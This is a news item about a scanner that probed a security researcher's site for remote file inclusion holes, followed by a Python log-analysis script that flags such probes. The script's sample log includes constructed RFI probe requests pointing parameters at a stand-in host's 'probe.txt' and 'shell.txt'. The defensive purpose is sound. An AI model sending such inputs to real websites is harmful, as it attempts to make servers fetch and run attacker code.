If You Try to Pwn a Website, Make Sure It's Not the Personal Domain of a Security Researcher
upstart writes:
Submitted via IRC for Bytram
Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro.
Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
[...] He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site.
"Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg.
"It's a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed."
Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language - Portuguese.
[...] The Akamai security engineer told El Reg that, for admins, the big takeaway from his experience is the importance of watching logs, patching site management tools, and writing web code that cannot be exploited for RFI.
"Make sure their application patches are up to date," Cashdollar advised. "Keep track of any new vulnerabilities discovered in software they're using for content management and site delivery and patch when new vulnerabilities are disclosed by the vendor."
Read more of this story at SoylentNews.
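As an added example that is not from the article or from Cashdollar's own tooling, the Python script below applies the log-watching advice above: it parses constructed Apache-style access-log lines and flags any query parameter whose value is a URL, the pattern the article describes an RFI scanner supplying to a form variable. The log format, sample lines and function names are assumptions made for this example.

```python
"""Flag access-log requests whose query parameters carry a URL, the
signature of an automated remote-file-inclusion (RFI) probe.
The sample log lines are constructed for this example."""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# An RFI probe supplies a fetchable URL as a parameter value; a normal value is a page name or keyword.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(lines):
    """Return one finding per (request, parameter) whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line: skip rather than guess at fields
        parts = urlsplit(m['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; this catches a double-encoded scheme
            if URL_VALUE_RE.match(value):
                findings.append({'ip': m['ip'], 'time': m['time'], 'path': parts.path,
                                 'param': name, 'url': value, 'status': int(m['status'])})
    return findings


def probes_by_ip(findings):
    """Count flagged requests per client, to spot a scanner cycling through parameters."""
    return dict(Counter(f['ip'] for f in findings))


# Constructed sample: two benign requests, two probes, one POST with no query string.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2019:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2019:13:55:37 +0000] "GET /index.php?page=http://example.invalid/probe.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2019:14:02:11 +0000] "GET /tool.php?file=http%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.1" 404 0 "-" "curl/7.64.1"',
    '203.0.113.9 - - [10/Oct/2019:14:05:00 +0000] "GET /search?q=compare+http+vs+https HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2019:14:05:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} param={hit['param']} url={hit['url']} ({hit['status']})")
    print(probes_by_ip(find_rfi_probes(SAMPLE_LOG)))
```

Form variables sent in a POST body never reach the access log, so this only catches probes that place the URL in the query string; application-level request logging is needed to see the rest.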